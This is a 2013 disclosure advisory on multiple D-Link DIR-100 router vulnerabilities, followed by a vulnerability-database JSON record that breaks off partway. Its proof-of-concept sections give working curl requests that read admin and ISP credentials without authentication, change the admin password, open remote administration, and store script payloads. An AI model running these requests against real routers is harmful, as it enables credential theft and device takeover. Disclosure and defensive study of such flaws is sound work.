* Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline

1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

  • Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
  • Retrieve sensitive configuration parameters like the pppoe username and password without authentication [CWE-200]
  • Execute privileged commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
  • Send a formatted request to a victim, which will then execute arbitrary commands on the device (CSRF) [CWE-352]
  • Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]

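CVE-Numbers for these vulnerabilities have not yet been assigned. (The report header above nevertheless lists CVE-2013-7051 through CVE-2013-7055, so this sentence appears to predate the assignment.)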

3 Technical Description of the Vulnerabilities

3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on /cliget.cgi for unauthenticated users and /cli.cgi for authenticated requests.

A list of the features provided by each cgi-script can be retrieved with:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

3.1 Authentication Bypass

Description

The administrator password is not protected in any way on the device: it can be read by any attacker with access to the administrator interface, which listens on port 80. The request that retrieves the administrator password does not need to be authenticated.

Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

3.2 Weak Authentication

Description

As soon as a user is logged into the administration interface, the cli CGI is unlocked and can be used without prior authentication, because the cgi-script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the request comes from the same IP address.

Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/'

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login

3.3 Retrieve sensitive information

Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device as well, such as the PPTP and poe username and password, the configured dyndns username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

3.4 Cross-Site Request Forgery (CSRF)

Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

Proof of Concept

Changing the password for administrator can be done when the ip-address is authenticated:

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'

# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

3.5 Cross-Site Scripting (XSS)

Description

It is possible for an authenticated user to store information on the server that is not checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. With this vulnerability the victim (administrator) will run javascript code in the context of the D-Link DIR-100.

XSS is possible because the input is filtered and validated only on the client side (javascript code); data sent directly to the CGI scripts is not checked.

Proof of Concept

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

#  XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='

# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system.
Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet port. It is recommended to upgrade the router to the newest firmware of the D-Link DIR-100; the report header names the 403b13 firmware image (DIR-100_fw_revd_403b13_ALL_de_20131011.zip) as the patched release.

5 Timeline

2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0669",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.03b07"
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dir-100  firmware  4.03b07"
      },
      {
        "model": "dir-100 ethernet broadband router 4.03b07",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b07",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Felix Richter",
    "sources": [
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2013-7054",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2013-7054",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2014-01478",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "id": "CVE-2013-7054",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2013-7054",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7054",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7054",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01478",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-035",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary  script code in the browser of an unsuspecting user in the context of the  affected device, steal cookie-based authentication credentials,  bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n    * Hardware Revision: D1\n    * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n    * CWE-287 Authentication Issues:             CVE-2013-7051\n    * CWE-255 Issues with Credential Management: CVE-2013-7052\n    * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053\n    * CWE-79  Cross-Site Scripting:              CVE-2013-7054\n    * CWE-200 Information Disclosure:            CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n    1. Background\n    2. Technical Description\n    4. Severity and Remediation\n    5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. 
\n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker to:\n\n - Retrieve the Administrator password without authentication leading to\n   authentication bypass [CWE-255]\n - Retrieve sensitive configuration parameters like the pppoe username and\n   password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n   condition leading to weak authentication enforcement [CWE-287]\n - Send a formatted request to a victim which then will execute arbitrary\n   commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n   accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities have not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nThe list of features provided by each cgi-script can be retrieved by:\n\n    curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n    # and respectively when authenticated\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device: every\nattacker with access to the administrator interface, which listens on port 80,\ncan retrieve it. The request for the Administrator password does not need to be\nauthenticated. 
\n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n    \n    # open the router interface in a web browser and log in\n    firefox  \u0027http://192.168.0.1/\u0027 \n    \n    # open a new terminal or another web-browser which is currently not logged\n    # in and try to access\n\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n    # this request will be authenticated and it will not be redirected to the\n    # login page. If no user is logged in, the request will be redirected to\n    # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. 
\n\n### Proof of Concept\n\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n    curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    # Change password\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n    # enable remote console\n    curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. 
\n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n    # Log into DIR-100\n    curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n    #  XSS in Static IP Address Tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n    # XSS in Scheduler tab\n    curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system.  \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7054",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "65290",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "125041",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "id": "VAR-202002-0669",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:36:11.475000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "http://www.dlink.lt/en/"
      },
      {
        "title": "D-Link DIR-100 has multiple patches for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/44084"
      },
      {
        "title": "D-Link DIR-100 Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107307"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90906"
      },
      {
        "trust": 2.3,
        "url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
      },
      {
        "trust": 1.6,
        "url": "https://www.securityfocus.com/bid/65290/info"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
      },
      {
        "trust": 0.4,
        "url": "http://more.dlink.de/sicherheit/news.html#news8"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2014/feb/4"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/login.htm\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
      },
      {
        "trust": 0.1,
        "url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01478"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007142"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-035"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7054"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
